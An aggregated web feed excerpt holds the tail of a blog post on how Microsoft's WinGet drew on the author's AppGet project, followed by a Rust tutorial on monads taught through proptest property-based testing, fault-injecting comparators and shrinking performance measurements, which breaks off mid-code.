    it was a pleasure to meet you and to find out more about appget. I’m following up on the azure startup pricing for you. As you know we are big fans of package managers on Windows and we are looking to do more in that space. My team is growing and part of that is to build a team who is responsible for ensuring package managers and software distribution on Windows makes a big step forward. We are looking to make some significant changes to the way that we enable software distribution on Windows and there’s a great opportunity (well I would say that wouldn’t I?) to help define the future of Windows and app distribution throughout Azure/Microsoft 365.

    With that in mind have you considered spending more time dedicated to appget and potentially at Microsoft?

    Initially, I was a bit hesitant; I didn’t want to go to Microsoft to work on Windows Store, the MSI engine or some other app deployment-related stuff. Shortly after, I was assured that I would spend all my time on AppGet. After about a month of prolonged email back and forth, we came to the conclusion that the arrangement would be very similar to an acqui-hire; Microsoft would hire me, AppGet would come with me, and they would decide if they wanted to rename it to something else, or it would become Microsoft AppGet.

    Throughout the whole process, I was very unclear on what my role would be at Microsoft. What would my responsibilities be? Who would I report to? Would anyone report to me? I tried to clear up some of these questions throughout those slow conversations but never got a clear answer.

    After another few months of again very slow email conversations, I was told that the acqui-hire process through BizDev would take a very long time. An alternative to speed up the process would be just to hire me with a “bonus” and then work on migrating the code ownership after the fact. I didn’t have any objections, so we scheduled some meetings/interviews in Redmond.

    I flew to Seattle on December 5th to have a full day of interviews/meetings at Microsoft HQ. I met with four different people; three of the meetings were more like your typical interviews; the meeting with Andrew was more about what we should do once this is all over and how we would migrate AppGet’s process and infrastructure to be able to handle Microsoft’s scale. We talked about some of our options, but in general, I thought everything went well.

    My last meeting ended at around 6 pm. I took an Uber to the airport and was back in Vancouver.

    Until earlier this week, when I was given a heads-up about WinGet’s launch the next day,

    Hi Keivan, I hope you and your family are doing well — BC seems to have a good handle on covid compared to the us.

    I’m sorry that the pm position didn’t work out. I wanted to take the time to tell you how much we appreciated your input and insights. We have been building the windows package manager and the first preview will go live tomorrow at build. We give appget a call out in our blog post too since we believe there will be space for different package managers on windows. You will see our package manager is based on GitHub too but obviously with our own implementation etc. our package manager will be open source too so obviously we would welcome any contribution from you.

    I look forward to talking to you about our package manager once we go live tomorrow. Obviously this is confidential until tomorrow morning so please keep this to yourself. You and chocolatey are the only folks we have told about this in advance.

    Regards
    Andrew

    I wasn’t too surprised; I had figured out months ago that the “Microsoft thing” wasn’t happening.

    I waited until the next day to see what this new package manager was going to be like. When I finally saw the announcement and the GitHub repositories, I was shocked? Upset? I wasn’t even sure what I was looking at.

    When I showed it to my friend, the first thing he said was, “They called it WinGet? Are you serious!?” I didn’t even have to explain to him how the core mechanics, terminology, the manifest format and structure, even the package repository’s folder structure, are very much inspired by AppGet.

    Am I upset they didn’t hire me? Not really. After visiting the campus, I wasn’t too sure I wanted to work for such a big company, and moving from Canada to the U.S. wasn’t something I was too excited about either. Also, throughout the process, at no time did I assume this was a done deal.

    Am I upset that Microsoft, a 1.4 trillion-dollar company, finally got their act together and released a decent package manager for their flagship product? No, they should’ve done it years ago. They shouldn’t have screwed Windows Store as badly as they did.

    Realistically, no matter how hard I tried to promote AppGet, it would never grow at the rate a Microsoft solution would. I didn’t create AppGet to get rich or to become famous or get hired by Microsoft. I created AppGet because I thought us Windows users deserved a decent app management experience too.

    What bothers me is how the whole thing was handled. The slow and dreadful communication speed. The total radio silence at the end. But the part that hurts the most was the announcement. AppGet, which is objectively where most ideas for WinGet came from, was only mentioned as another package manager that just happened to exist, while other package managers that WinGet shares very little with were mentioned and explained much more deliberately.

    There is a silver lining. WinGet will be built on a solid foundation and has the potential to succeed. And we, the neglected Windows users, might finally have a decent package manager.

    Live and learn.

    Edit to clarify some issues,

    May 27th, 2020 19:04 PST

    But AppGet is Open Source

    Code being copied isn't an issue. I knew full well what it meant to release something open source, and I don't regret it one bit. What was copied with no credit is the foundation of the project: how it actually works. If I were the patenting type, this would be the thing you would patent. P.S. I don't regret not patenting anything.

    And I don't mean the general concept of package/app managers; they have been done a hundred times. If you look at similar projects across OSes (Homebrew, Chocolatey, Scoop, Ninite, etc.), you'll see they all do it in their own way. However, WinGet works pretty much identically to the way AppGet works.

    Do you want to know how Microsoft's WinGet works? Go read the article I wrote 2 years ago about how AppGet works.

    I'm not even upset they copied me. To me, that's a validation of how sound my idea was. What upsets me is how no credit was given.

    You should've followed up.

    I did. There was an issue with my travel reimbursement, so I contacted the HR contact and at the same time asked about the interviews. She told me someone would get back to me about that, and they never did. This was on Feb 14th, 2020.


    ]]>
    https://keivan.io/the-day-appget-died/ hacker-news-small-sites-43218725 Sat, 01 Mar 2025 12:44:55 GMT
    <![CDATA[Demystifying monads in Rust through property-based testing]]> thread link) | @lukastyrychtr
    March 1, 2025 | https://sunshowers.io/posts/monads-through-pbt/ | archive.org

    In programming pedagogy, monads have a place as a mystical object from the functional programming world that’s hard to understand and even harder to explain. The stereotype about monad explanations is that they fall into two buckets: either comparisons to some kind of food item, or throwing complex mathematical jargon at you (“a monad is just a monoid in the category of endofunctors, what’s the problem?”).

    But monads aren’t esoteric or magical at all, nor do they only occur in functional programming. In essence, a monad is a design pattern that allows you to chain together operations within a framework. Noticing monadic design can be quite helpful for programmers in any environment, particularly because it’s often undesirable! In many situations, monads have observable tradeoffs, and sometimes (as here) we can even collect concrete data to back this up.

    I’m going to try and explain monads in a way that is:

    • Geared towards Rust developers, with code samples in Rust, though I hope any sufficiently curious programmer can follow along
    • Free of jargon: no mathematical formalism whatsoever
    • Without analogies of any kind, and grounded in real programming problems
    • Non-trivial: focusing on a production-worthy example with objectively measurable implications
    • Practical: with advice all of us coders can use

    In other words, I’m going to try and write the monad tutorial that I personally would have appreciated when I was younger. And I’m going to start at a place that’s unconventional: through property-based testing, where monads have profound performance characteristics.

    Note: While this article’s primary goal is to explain monads, it also serves as a practical introduction to property-based testing and fault injection techniques. If you’re new to these, you’ll find an introduction to both alongside the monad explanation.

    This post consists of five sections:

    1. Property-based testing goes over the basics
    2. Drawing the rest of the owl talks about a complex scenario: using property-based testing to inject faults
    3. Integrated shrinking shows how to reduce inputs of challenging complexity to smaller sizes
    4. Monads, finally is where we introduce monads in this context, and provide data for how costly they can be
    5. Rediscovering structure discusses some ways to mitigate the tradeoffs of monads in property-based testing

    1. Property-based testing#

    Testing is fundamentally about building models for how your code should behave, at just the right level of complexity: a model should match the scope of what you’re testing, without going overboard and reinventing the whole system a second time.

    The best explication of this general idea I’ve seen is in this piece by the great Argentinian writer Jorge Luis Borges:

    …In that Empire, the Art of Cartography attained such Perfection that the map of a single Province occupied the entirety of a City, and the map of the Empire, the entirety of a Province. In time, those Unconscionable Maps no longer satisfied, and the Cartographers Guilds struck a Map of the Empire whose size was that of the Empire, and which coincided point for point with it…”

    —On Exactitude in Science, Jorge Luis Borges

    Nothing quite exemplifies testing-as-modeling like property-based testing—an approach where instead of specifying exact examples, you define models in terms of properties, or invariants, that your code should satisfy. Then, you test your models against randomly generated inputs.

    Let’s take a simple example of a sort function, say my_sort, defined over a slice of integers:

    fn my_sort(slice: &mut [u64]) {
        // ...
    }
    

    How should we go about testing it?

    The most common way to do this is to list out a bunch of inputs and ensure they are correctly sorted, through example-based tests.

    #[test]
    fn test_my_sort() {
        let mut input = [1, 2, 0, 2, 0, 5, 6, 9, 0, 3, 1];
        my_sort(&mut input);
        assert_eq!(input, [0, 0, 0, 1, 1, 2, 2, 3, 5, 6, 9]);
    
        // More examples listed out.
    }
    

    Example-based tests are quite valuable, because they are easy to write and quite direct about what happens. But even in a simple example like sorting, it’s easy to imagine cases where your examples don’t quite cover every edge case.

    How can more edge cases be covered? Well, one way to do so is to step back and ask, what is the sort trying to do? The goal of a sort function is to ensure that all the elements are in ascending order. Can we test that directly?

    The first thing we’d need is to get some inputs to test with. All we care about is a list of numbers here, which seems like it should be easy to generate using a random number generator.

    So maybe we write something like:

    #[test]
    fn test_my_sort_2() {
        // Run the test 1024 times.
        for _ in 0..1024 {
            // Generate a random list of, say, 0 to 512 elements, with values
            // between 0 and 10000.
            let input = /* ... */;
    
            let mut output = input.clone();
            // Call the sort function on it.
            my_sort(&mut output);
    
            // Check that all values are in ascending order.
            for i in 1..output.len() {
                assert!(
                    output[i - 1] <= output[i],
                    "input {input:?} failed at index {i}, output {output:?}",
                );
            }
        }
    }
    

    We now have a model of sorting that we’ve written down in code form: any pair of values must be in ascending order. (In this view, example-based tests are also simple models: for input X, the output should be Y.)
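
    The post leaves the generation step elided; as one possible way to fill it in (a sketch of mine using the rand crate, not code from the post):

    use rand::Rng;

    fn random_input() -> Vec<u64> {
        let mut rng = rand::thread_rng();
        // A random length between 0 and 512...
        let len = rng.gen_range(0..=512);
        // ...and values between 0 and 10000, as described above.
        (0..len).map(|_| rng.gen_range(0..10000)).collect()
    }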

    Now, we run the test, and…

    thread 'test_my_sort_2' panicked at tests/tests.rs:33:13:
    input [7496, 2087, 6900, 7927, 3840, 3065, 6472, 1186, 6464, 4512, 251, 5591, 3410, 2033, 5367, 2202, 5544, 2434, 6491, 8999, 9818, 2885, 8683, 1201, 6115, 2584, 2473, 6817, 5765, 5196, 9389, 5799, 9012, 293, 38, 1024, 9569, 4654, 7449, 7389, 8088, 5074, 3110, 938, 4944, 3859, 7368, 8978, 7524, 9503, 7406, 7591, 8213, 6445, 7000, 7354, 8967, 5549, 7935, 1866, 4048, 4043, 8905, 3154, 4771, 2364, 3982, 5088, 7317, 233, 3396, 1810, 3022, 9065, 454, 6181, 8257, 9598, 3982, 920, 5880, 4165, 4164, 930, 560, 9062, 5587, 6271, 5878, 2495, 9055, 3877, 4352, 1228, 8287, 8901, 3442, 373, 3635, 5316, 4423, 7688, 7919, 4465, 8991, 7043, 7696, 6875, 1478, 2428, 5127, 6809, 6175, 1415, 7263, 5145, 4153, 876, 1528, 6781, 5627, 6750, 3665, 2567, 6855, 141, 2144, 4491, 9121, 7982, 4131, 6337, 1926, 8797, 9382, 1702, 9559, 3910, 1715, 6661, 269, 4366, 6185, 5616, 365, 808, 4864, 3657, 9574, 3057, 7760, 6375, 2326, 7273, 6303, 7018, 8988, 6271, 988, 7796, 2390, 1689, 4279, 9586, 151, 9738, 3659, 7064, 1529, 8237, 4211, 2272, 8909, 7638] failed at index 173, output [38, 141, 151, 233, 251, 269, 293, 365, 373, 454, 560, 808, 876, 920, 930, 938, 988, 1024, 1186, 1201, 1228, 1415, 1478, 1528, 1529, 1689, 1702, 1715, 1810, 1866, 1926, 2033, 2087, 2144, 2202, 2272, 2326, 2364, 2390, 2428, 2434, 2473, 2495, 2567, 2584, 2885, 3022, 3057, 3065, 3110, 3154, 3396, 3410, 3442, 3635, 3657, 3659, 3665, 3840, 3859, 3877, 3910, 3982, 3982, 4043, 4048, 4131, 4153, 4164, 4165, 4211, 4279, 4352, 4366, 4423, 4465, 4491, 4512, 4654, 4771, 4864, 4944, 5074, 5088, 5127, 5145, 5196, 5316, 5367, 5544, 5549, 5587, 5591, 5616, 5627, 5765, 5799, 5878, 5880, 6115, 6175, 6181, 6185, 6271, 6271, 6303, 6337, 6375, 6445, 6464, 6472, 6491, 6661, 6750, 6781, 6809, 6817, 6855, 6875, 6900, 7000, 7018, 7043, 7064, 7263, 7273, 7317, 7354, 7368, 7389, 7406, 7449, 7496, 7524, 7591, 7638, 7688, 7696, 7760, 7796, 7919, 7927, 7935, 7982, 8088, 8213, 8237, 8257, 8287, 8683, 8797, 8901, 8905, 8909, 8967, 8978, 8988, 8991, 8999, 9012, 9055, 9062, 9065, 9121, 9382, 9389, 9503, 9559, 9569, 9574, 9586, 9598, 9818, 9738]
    note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
    

    Whoops, looks like the function has a bug. (Scroll the above example to the right!)

    This example is quite unhelpful and hard to understand! It is possible to use this as an input to debug with, but it is quite painful. If we could use automation to turn this test case into a much smaller one that can still reproduce the bug, debugging becomes significantly easier. The process of doing so is called test case shrinking or reduction.

    To recap—property-based testing consists of two components:

    • Test case generation using a source of randomness.
    • On failing a test, shrinking it down to a smaller, more understandable size.

    Implementing a manual shrinker#

    What counts as “smaller”? For a list of numbers, ideally we’d be able to minimize both the number of items in the list and the integers themselves. This suggests an algorithm for how to write a shrinker by hand:

    • First, try and minimize the size of the list using a binary search algorithm. For example:

      • Try the first half of the list against the function.
      • If that exhibits an error, attempt to recursively shrink this half.
      • If that doesn’t work, try it with the last half of the list.
      • If neither work or if the list has 1 or fewer elements, move on to the next step.
    • Once the list has been shrunk, start shrinking the elements within the list, applying binary search to each element.

    After you’re done writing this algorithm, you’re well on your way towards creating the original property-based testing library, QuickCheck. This approach has you write two functions: a generator and a shrinker.
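
    As a rough sketch (my own, not from the post), the hand-written shrinker described above might look something like this, where fails reruns the property and reports whether the input still triggers the bug:

    fn shrink_list(input: &[u64], fails: &dyn Fn(&[u64]) -> bool) -> Vec<u64> {
        // Step 1: try to shrink the length, binary-search style, by
        // recursively testing each half of the list.
        if input.len() > 1 {
            let (first, last) = input.split_at(input.len() / 2);
            if fails(first) {
                return shrink_list(first, fails);
            }
            if fails(last) {
                return shrink_list(last, fails);
            }
        }
        // Step 2: the length can't be reduced further, so binary-search
        // each element down towards zero, keeping only changes that
        // still reproduce the failure.
        let mut out = input.to_vec();
        for i in 0..out.len() {
            let (mut lo, mut hi) = (0u64, out[i]);
            while lo < hi {
                let mid = lo + (hi - lo) / 2;
                out[i] = mid;
                if fails(&out) {
                    hi = mid;
                } else {
                    lo = mid + 1;
                }
            }
            out[i] = hi; // the smallest value for this element that still fails
        }
        out
    }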

    With this, you can get much more reasonable-looking output:

    input [58, 33] failed at index 1, output [58, 33]
    

    And for relatively simple cases like lists of integers, this kind of shrinking works quite well!

    But we’re not here to test simple cases. We’re here for the difficult ones.

    2. Drawing the rest of the owl#

    [Figure: a drawing guide with six-step instructions for a front-facing owl face, a side/45° profile view, and a front-facing owl with body; a subversion of the "draw the rest of the owl" meme.]
    Subverting the meme, we’re going to deal with real-world complexity in this section.

    Most real-world sort implementations don’t just work over a list of integers. They’re written to be polymorphic over anything which can be sorted. In Rust parlance, this means anything that implements the Ord trait; and even if not, a custom comparator function can be provided.

    But Ord can be written by hand, and custom comparators are virtually always written by hand.

    One immediate consequence is that it’s possible that the comparator function says two elements are equal, but they are actually different. In that case, should the order of elements be preserved?

    • A sort implementation which preserves the order is called a stable sort.
    • An implementation which does not is called an unstable sort.

    Unstable sorts tend to be faster than stable ones, and there are valid reasons for preferring each at different times. (The Rust standard library has separate implementations for stable and unstable sorts.)
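
    To make the distinction concrete, here is a small illustration (mine, not the post's) using the standard library's stable and unstable sorts on pairs compared by their first field only:

    fn main() {
        // (1, 'b') and (1, 'a') compare as equal under this key.
        let mut v = [(1, 'b'), (0, 'x'), (1, 'a')];
        // Stable: always yields [(0, 'x'), (1, 'b'), (1, 'a')].
        v.sort_by_key(|&(k, _)| k);
        println!("{v:?}");

        let mut w = [(1, 'b'), (0, 'x'), (1, 'a')];
        // Unstable: (1, 'b') and (1, 'a') may end up in either order.
        w.sort_unstable_by_key(|&(k, _)| k);
        println!("{w:?}");
    }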

    Additionally, hand-written implementations mean users can make mistakes! A production-grade sort algorithm must behave reasonably in the face of arbitrary user input, not just in the actual elements being sorted but also in the comparator function (full credit to Lukas Bergdoll for his extensive research here):

    • Ord safety: Users can write a comparator that’s simply incorrect. An easy way is to introduce a difference between ordering and equality, for example by returning Ordering::Less for two elements that are actually equal. Users could also return different answers for the same comparison when called at different times[1].

    • Panic safety: The comparator can panic in the middle of execution. Since panics can be caught, the input should be in some kind of valid state afterwards.

    • Observation safety: If any of the inputs are mutated by the comparator, those mutations must be carried through to the final output. (With Rust, mutation through shared references is possible via interior mutability, as seen in RefCell or Mutex).

    In these cases, completing the sort successfully becomes impossible. But it’s important that we leave the input in a reasonable state.

    How do we go about testing this? Trying to think of all the different failure modes seems really hard! But property-based testing can address this need through randomized fault injection.

    Let’s focus on Ord safety for now, with a comparator that flips around the result 20% of the time:

    #[derive(Clone, Copy, Debug)]
    enum OrdBehavior {
        Regular,
        Flipped,
    }
    
    #[derive(Clone, Debug)]
    struct BadType {
        value: u64,
        ord_behavior: RefCell<Vec<OrdBehavior>>,
    }
    
    // (The PartialEq, Eq, and PartialOrd impls required by Ord are
    // omitted here for brevity.)
    impl Ord for BadType {
        fn cmp(&self, other: &Self) -> Ordering {
            // Get the next behavior from the list.
            match self.ord_behavior.borrow_mut().pop() {
                Some(OrdBehavior::Regular) | None => {
                    self.value.cmp(&other.value)
                }
                Some(OrdBehavior::Flipped) => {
                    // Flip the comparison.
                    other.value.cmp(&self.value)
                }
            }
        }
    }
    

    To generate a BadType:

    fn generate_bad_type() -> BadType {
        // Generate a value between 0 and 10000;
        let value = /* ... */;
        // Generate a list of behaviors of length 0..128, where the elements are
        // Regular 4/5 times and Flipped 1/5 times.
        let ord_behavior: Vec<OrdBehavior> = /* ... */;
    
        BadType {
            value,
            ord_behavior: RefCell::new(ord_behavior),
        }
    }
    

    And to test this:

    #[test]
    fn test_my_sort_3() {
        // Run the test 1024 times.
        for _ in 0..1024 {
            // Generate a list of BadTypes using generate_bad_type.
            let input: Vec<BadType> = /* ... */;
    
            // Call sort as before.
            let mut output = input.clone();
            my_sort(&mut output);
    
            // Sorting isn't really well-defined in this case, but we can
            // ensure two properties:
            //
            // 1. my_sort doesn't panic (implicitly checked by getting here)
            // 2. all the input values are still present in the output
            let mut input_values: Vec<u64> =
                input.iter().map(|v| v.value).collect();
            let mut output_values: Vec<u64> =
                output.iter().map(|v| v.value).collect();
    
            // Sort the input and output values, and assert that they match.
            my_sort(&mut input_values);
            my_sort(&mut output_values);
            assert_eq!(input_values, output_values);
        }
    }
    

    Our original approach continues to work well—that is, right until the test finds a bug and we need to shrink a failing input.

    3. Integrated shrinking#

    How does one go about writing a shrinker for Vec<BadType>? Doing so seemed relatively straightforward for a list of integers. But this is a list where the elements are pairs of an integer and another list. Also:

    • We’ve just tested Ord safety so far—once we’ve added fault injection for other kinds of safety, the complexity seems endless.

    • And even more importantly, there isn’t a great way to compose smaller shrinkers together to form larger ones. Writing shrinkers is a lot of work already, and what’s the point if you have to keep doing all of it over and over?

    The practical result is that most of the time, writing a shrinker for types like Vec<BadType> is quite difficult. And writing one is also technically optional, since:

    • If the test passes, shrinkers are never invoked. Simply write correct code, and shrinking just isn’t an issue!
    • If the test fails, developers can debug using the original input. It’s painful but possible.

    All in all, given the choice of writing a shrinker by hand or just moving on with their lives, most developers tend to choose the latter[2]. Because of this, most modern property-based testing frameworks, like proptest in Rust, try and take care of shrinking for you through some notion of integrated shrinking.

    The idea behind integrated shrinking is: When you generate a random input, you don’t just generate the value itself. You also generate some context that is helpful for reducing the size of the input.

    • In proptest, this combined value and context is called a value tree.
    • Any implementation that accepts a random number generator and turns it into a value tree is called a strategy. (A simplified sketch of the value tree interface follows.)
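
    Roughly speaking (a simplification on my part; the real proptest traits have more moving parts), the value tree interface looks like:

    trait ValueTree {
        type Value;
        // The value this tree currently represents.
        fn current(&self) -> Self::Value;
        // Try to make the value smaller; returns false when it can't.
        fn simplify(&mut self) -> bool;
        // Backtrack after a simplify step that no longer fails the test.
        fn complicate(&mut self) -> bool;
    }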

    The proptest library comes with many different kinds of strategies that can be composed together to create more complex ones. To generate an instance of OrdBehavior, we’re going to use two strategies:

    • The Just strategy, which “just” returns a single value.
    • The prop_oneof strategy, which generates values from one of a possible list of strategies, where each choice has a given probability. (A function that takes one or more strategies as input, and produces a strategy as its output, is called a combinator.)
    fn generate_ord_behavior() -> impl Strategy<Value = OrdBehavior> {
        prop_oneof![
            // 4/5 chance that the Regular implementation is generated.
            4 => Just(OrdBehavior::Regular),
            // 1/5 chance that it's flipped.
            1 => Just(OrdBehavior::Flipped),
        ]
    }
    

    To generate BadType, we’re going to use generate_ord_behavior, as well as:

    • A range strategy such as 0..10000_u64, which generates values within the range uniformly at random.
    • The vec combinator, which accepts a strategy for elements and a size parameter.
    fn generate_bad_type() -> impl Strategy<Value = BadType> {
        // Use the range strategy to generate values uniformly at random.
        let value_strategy = 0..10000_u64;
    
        // Use the vec strategy to generate a list of behaviors: 0..128 items.
        let ord_behavior_strategy = vec(generate_ord_behavior(), 0..128);
    
        // Now what? We need to compose these strategies together. With proptest,
        // the way to do this is to first create a tuple of strategies.
        let tuple_strategy = (value_strategy, ord_behavior_strategy);
    
        // A tuple of strategies is also a strategy! Generated values are a tuple
        // of constituents.
        //
        // With this in hand, we can use a function called `prop_map` to turn the
        // tuple into a BadType.
        tuple_strategy.prop_map(|(value, ord_behavior)| {
            BadType {
                value,
                ord_behavior: RefCell::new(ord_behavior),
            }
        })
    }
    
    [Figure: a flowchart showing how smaller strategies flow into larger ones; see the code comments in the sample above for a full explanation.]
    Composing smaller strategies into a larger one for BadType.

    You might be wondering where all the shrinking code is. It’s actually implemented on the corresponding value trees for each strategy:

    • Range strategies use binary search to make values smaller.
    • The Just strategy doesn’t do any shrinking, since it just returns a single value.
    • The prop_oneof combinator shrinks towards the beginning of the choices: in this case, Flipped is shrunk into Regular.
    • The vec combinator implements roughly the algorithm in Implementing a manual shrinker above.

    You can see how the base strategies get turned into successively larger ones through combinators like prop_oneof. It’s very similar to Iterator, where you can keep calling .map, .filter, .enumerate and so on over and over[3].

    In my experience, composability across different scales is where this model shines. You can build bigger strategies out of smaller ones, up to a surprising amount of complexity. This means that your team can invest in a library of ever-more-complex strategies, and continue to derive value out of that library across everything from the smallest of unit tests to large integration tests.

    But there is one massive wrinkle with integrated shrinking. And that wrinkle is exactly what monads are about.

    4. Monads, finally#

    In the previous few sections, we’ve built up all the context we need. We’re now going to look at the fundamental operation that introduces monadic composition to proptest: prop_flat_map.

    [Figure: prop_map behavior before and after shrinking. The original value 100 passes through prop_map(x²) to produce 10000; after shrinking, 50 passes through the same function to produce 2500. prop_map preserves the same transformation during shrinking, just with smaller values.]
    prop_map from x to x². When values are shrunk, they transparently pass through the map function.

    In the example above, there’s a function called prop_map, which we use to turn a tuple of components into a BadType value. What happens when you try and shrink a value through a prop_map? It’s very simple:

    • Attempt to get a smaller value from the underlying value tree.
    • Call the map function on the value.

    So prop_map is just a conduit that values pass through: it simply maps a value to another value, and does not change the structure of the value tree in any way.

    Now let’s say we want to test out pairs of BadType instances, where the way the second BadType is generated depends on the first. This is a situation where we don’t just want to map a value to another value—we need to generate a whole new strategy based on a value.

    This is a fundamental shift:

    • As above, prop_map transforms a value into another, but preserves the original structure.
    • This new method, prop_flat_map, goes well beyond that. Based on the value generated, it creates a brand new strategy with a structure all of its own.

    This is monadic composition in action. The result of one operation controls, at runtime, the entire shape of the next operation.

    For example, here’s one way to go about generating pairs of BadTypes, where the second value is always greater than the first:

    fn generate_bad_type_pair() -> impl Strategy<Value = (BadType, BadType)> {
        // First generate a BadType.
        generate_bad_type().prop_flat_map(
            |first_bad_type| {
                // Now generate a second BadType with a value greater than the first.
                (
                    (first_bad_type.value + 1)..20000_u64,
                    vec(generate_ord_behavior(), 0..128),
                )
                .prop_map(move |(second_value, ord_behavior)| {
                    // Generate the second value.
                    let second_bad_type = BadType {
                        value: second_value,
                        ord_behavior: RefCell::new(ord_behavior),
                    };
    
                    // Return the pair.
                    (first_bad_type.clone(), second_bad_type)
                })
            }
        )
    }
    

    Your first reaction might be: wow, this seems really powerful. And you would be right! You can write whatever you like in the body of a prop_flat_map:

    • You can conditionally return one strategy or another, reimplementing prop_oneof.
    • You can first generate a size and then return a vector with those many elements, reimplementing the vec combinator.
    • You can call prop_flat_map again, as many times as you like.

    In a real and quite rigorous sense, prop_flat_map is maximally powerful. Every combinator we’ve talked about, and in fact most of the proptest library, can be written in terms of prop_flat_map.
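
    For instance, here is a sketch (an illustration of the second bullet above, not code from the post) of reimplementing the vec combinator: first generate a length, then flat-map it into a strategy producing exactly that many elements.

    use proptest::collection::vec;
    use proptest::prelude::*;

    fn vec_via_flat_map() -> impl Strategy<Value = Vec<u64>> {
        (0..128usize).prop_flat_map(|len| {
            // A brand-new strategy, with its own structure, is created
            // for every length the outer strategy produces.
            vec(0..10000u64, len)
        })
    }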

    So why do all these combinators exist? Why don’t we just use prop_flat_map everywhere?

    The function actually works reasonably well in practice. It generates random values with the right shape, and shrinks them correctly on a failing input.

    But.

    Shrinking is really, really slow.

    Exponentially slow.

    [Figure: prop_flat_map behavior before and after shrinking. The original value 100 passes through prop_flat_map(0..x²) to create the strategy 0..10000, which produces 8634; after shrinking to 50, a completely new strategy 0..2500 (highlighted) is created, generating multiple different outputs. Shrinking creates an entirely new structure rather than preserving the original one.]
    prop_flat_map with a map from x to the strategy 0..x². Each time the original value is shrunk, a brand-new strategy is created (highlighted in red) and the shrinker has to start over.

    Why is that the case? Consider what happens when we want to shrink a value through a prop_flat_map. As before:

    • We would attempt to get a smaller value from the underlying value tree.
    • And then, because we would call the prop_flat_map callback to generate a new strategy, we would throw away the previously-generated value tree entirely.

    Because prop_flat_map generates brand new value trees each time it’s called, shrinking has to be started again, from scratch, each time! This is the essence of monadic composition: powerful, unconstrained, and fundamentally unpredictable.

    Measuring the impact#

    We can measure the impact of monadic composition quite directly, along two related axes: the amount of time it takes to complete iterations, and the number of iterations the shrink completes in.

    For this post I wrote a small Rust program which collects metrics about shrinking for:

    • The prop_flat_map implementations for BadType pairs above, and a non-monadic implementation with prop_map (see below)
    • The same for (BadType, BadType, BadType) triples: a non-monadic implementation with prop_map, and a monadic one with two levels of prop_flat_map.

    With this program, I collected 512 samples on my workstation and analyzed the data. (I ran the program with opt-level set to 1, to mimic typical dev builds in larger Rust projects[4]).

    First, the amount of time it took to shrink values down, by key percentile:

    Metric   Pairs (prop_map)   Triples (prop_map)   Pairs (prop_flat_map)   Triples (prop_flat_map)
    min      11 µs              48 µs                3.85 ms                 8.95 ms
    p50      1.70 ms            2.52 ms              8.52 ms                 181 ms
    p75      3.74 ms            5.77 ms              10.04 ms                307 ms
    p90      5.25 ms            8.41 ms              11.76 ms                435 ms
    max      7.00 ms            10.55 ms             15.53 ms                1808 ms

    In this table, p50 represents the median completion time, while p75 and p90 show the times that 75% and 90% of the samples completed within. With prop_map, the amount of time scales somewhat linearly as we go from pairs to triples. But with just one additional level of prop_flat_map, the performance degrades dramatically, going from under 20 milliseconds to almost 2 seconds! That’s over 100x slower.

    The difference in the number of iterations is even more striking:

    Metric   Pairs (prop_map)   Triples (prop_map)   Pairs (prop_flat_map)   Triples (prop_flat_map)
    min      48                 93                   1,228                   11,223
    p50      215                306                  6,722                   281,016
    p75      270                354                  9,315                   481,996
    p90      310                410                  10,722                  693,358
    max      387                530                  12,242                  884,729

    From hundreds of iterations to almost a million! And we’re working with pretty simple structures here, too. Just one more level of prop_flat_map would make shrinking quite noticeably slow, and another one after that would be disastrous.

    The data here spans several orders of magnitude. A good way to visualize this kind of data is via a CDF plotted on a logarithmic scale. In these graphs, the x-axis shows the time or iterations, and the y-axis shows the cumulative probability. Curves that are further to the right are worse, and the logarithmic scale reveals that the differences are in orders of magnitude.

    [Figure: two log-log CDF plots, one of shrink execution time (x-axis roughly 10 µs to 10^6 µs) and one of shrink iteration count (x-axis 10 to 10^6 iterations), each with four curves: pair map, triple map, pair flat_map, and triple flat_map. The pair and triple map curves reach 100% cumulative probability first, at hundreds of microseconds and tens to hundreds of iterations; pair flat_map extends to tens of thousands, and triple flat_map towards a million. System: Ryzen 7950X, Linux 6.12, Rust 1.84.1, opt-level 1.]
    Cumulative distribution functions for prop_map and prop_flat_map pairs and triples. This is a logarithmic scale, so the differences are in orders of magnitude.

    5. Rediscovering structure#

    What makes monadic composition so difficult to deal with? It has to do with the fact, mentioned above, that you can write whatever you like inside the prop_flat_map. Because a prop_flat_map can contain arbitrary computation inside of it, and that computation returns brand-new strategies, determining how a value will shrink through it is fundamentally unpredictable without actually executing it.

    In other words, the prop_flat_map callback is quite opaque. Why is that? It’s because the prop_flat_map callback is written in Rust, which is a powerful, Turing-complete language. It is impossible to fully analyze the semantics of Turing-complete languages[5]. (You might know this as the halting problem, or as Rice’s theorem.)

    But the fact that some analysis requires solving the halting problem is merely the start of the discussion, not the end of it! There is a rich literature on how to find approximate solutions for problems that are otherwise insoluble due to Rice’s theorem. For shrinking, here are a few approaches that are known to work.

    One option is to place limits on how long shrinking is done for. Note that prop_flat_map has no issues while generating values, just while shrinking them[6]. The proptest library itself sets limits on shrink iterations, particularly across prop_flat_map instances. This ensures that shrinking operations finish in a reasonable amount of time, even if they don’t produce minimal values.
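
    As a sketch of what that looks like in practice (field names taken from proptest's Config as I understand it; treat the exact knobs as an assumption):

    use proptest::prelude::*;

    proptest! {
        #![proptest_config(ProptestConfig {
            // Give up shrinking after this many iterations...
            max_shrink_iters: 10_000,
            // ...or after this many milliseconds, whichever comes first.
            max_shrink_time: 5_000,
            ..ProptestConfig::default()
        })]
        #[test]
        fn bounded_shrinking(v in proptest::collection::vec(0..10000u64, 0..512)) {
            // The property under test would go here.
            prop_assert!(v.len() < 512);
        }
    }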

    A better option is to rewrite generators to not use monadic composition. For the example above, it’s not hugely difficult[7]:

    fn better_generate_bad_type_pair() -> impl Strategy<Value = (BadType, BadType)> {
        // Generate two BadType instances.
        (
            generate_bad_type(),
            generate_bad_type(),
        )
        // Look, no prop_flat_map! This is non-monadic composition.
        .prop_map(|(bad1, mut bad2)| {
        // Add bad1.value + 1 to bad2.value. Because the values are
        // non-negative (unsigned integers), this ensures that
        // bad2.value is always strictly bigger than bad1.value.
        bad2.value += bad1.value + 1;
            (bad1, bad2)
        })
    }
    

    But this can be quite challenging as complexity goes up! The proptest library comes with a number of helpers to write non-monadic strategies, particularly prop_recursive and sample::Index. But there are real situations, particularly with large and complex data structures (for example, randomly-generated programming language syntax trees), where none of those options suffice and you have to use the full power of prop_flat_map.
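
    As an example of the sample::Index approach (my own sketch, under the assumption that an Index resolves an abstract position against whatever length the generated vector ends up with):

    use proptest::collection::vec;
    use proptest::prelude::*;
    use proptest::sample::Index;

    // Generate a vector together with one of its elements, without
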